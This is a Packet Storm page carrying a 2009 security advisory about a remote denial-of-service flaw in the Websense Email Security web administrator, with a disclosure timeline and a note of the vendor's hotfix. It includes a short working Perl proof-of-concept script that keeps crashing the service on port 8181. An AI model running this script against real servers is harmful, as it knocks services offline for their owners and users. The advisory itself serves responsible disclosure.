exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Websense Email Security Web Administrator DoS

Websense Email Security Web Administrator DoS
Posted Oct 21, 2009
Authored by Nikolas Sotiriu | Site sotiriu.de

The Websense Email Security web administration frontend suffers from a remote denial of service vulnerability. Proof of concept code included.

tags | exploit, remote, web, denial of service, proof of concept
SHA-256 | eb3eb26757df239e889e54f61ddb2352fbee00b8d6c4222cfbbac4db658ca47b

Websense Email Security Web Administrator DoS

Change Mirror Download
_________________________________________
Security Advisory NSOADV-2009-002
_________________________________________
_________________________________________


Title: Websense Email Security Web Administrator DoS
Severity: Low
Advisory ID: NSOADV-2009-002
Found Date: 28.09.2009
Date Reported: 01.10.2009
Release Date: 20.10.2009
Author: Nikolas Sotiriu
Mail: nso-research (at) sotiriu.de
URL: http://sotiriu.de/adv/NSOADV-2009-002.txt
Vendor: Websense (http://www.websense.com/)
Affected Products: Websense Email Security v7.1
Personal Email Manager v7.1
Not Affected Products: Websense Email Security v7.1 Hotfix 4
Personal Email Manager v7.1 Hotfix 4
Remote Exploitable: Yes
Local Exploitable: Yes
Patch Status: Patched with Hotfix 4
Disclosure Policy: http://sotiriu.de/policy.html
Thanks to: Thierry Zoller: for the permission to use his
Policy



Background:
===========

Websense Email Security software incorporates multiple layers of
real-time Web security and data security intelligence to provide
leading email protection from converged email and Web 2.0 threats.
It helps to manage outbound data leaks and compliance risk, and enables
a consolidated security strategy with the trusted leader in Essential
Information Protection.

(Product description from Websense Website)

The Websense Email Security Web Administrator is a webfrontend, which
enables you to access the message administration, directory management
and to view the log.



Description:
============

The Web Administrator frontend (STEMWADM.EXE) listens by default on port
TCP/8181.

If an attacker sends a HTTP Request to port 8181 without waiting for a
response the webserver crashes. The proof of concept script just sends
a "GET /index.asp" and closes the socket. The server can not response
to the request anymore and dies.

By default the service will always restart after a crash. So the poc
will send the request until it will be stopped.



Proof of Concept :
==================

#!/usr/bin/perl
use Socket;

(($target = $ARGV[0]) && ($port = $ARGV[1])) || die "Usage: $0 ",
"<target> <port> \n";

print "\nThe Webserver on http://$target:$port should be dead until",
"this script is running\n";

while (1) {
$ip = inet_aton($target) || die "host($target) not found.\n";
$sockaddr = pack_sockaddr_in($port, $ip);
socket(SOCKET, PF_INET, SOCK_STREAM, 0) || die "socket error.\n";

connect(SOCKET, $sockaddr) || die "connect $target $port error.\n";

print SOCKET "GET /index.asp";
print "Request sent ...\n";

close(SOCKET);

sleep 1;

};





Solution:
=========

Vendor released a patch.

http://tinyurl.com/yhe3hqa



Disclosure Timeline (YYYY/MM/DD):
=================================

2009.09.28: Vulnerability found
2009.10.01: Ask for a PGP Key
2009.10.01: Websense sent there PGP Key
2009.10.01: Sent PoC, Advisory, Disclosure policy and planned disclosure
date to Vendor
2009.10.08: Websense was not able to reproduce the DoS Problem
2009.10.08: Sent a mail with more explanation
2009.10.13: Websense verifies the finding and fixed it. The path will be
available in Version 7.2 which will be released in ~2 weeks
2009.10.13: Ask for a list of affected versions/products and changed the
release date to 2009.10.29.
(no response)
2009.10.20: Found the KB article and the Hotfix on Websense website
2009.10.20: Release of this advisory








Login or Register to add favorites

File Archive:

December 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    2 Files
  • 2
    Dec 2nd
    12 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    14 Files
  • 6
    Dec 6th
    18 Files
  • 7
    Dec 7th
    11 Files
  • 8
    Dec 8th
    36 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close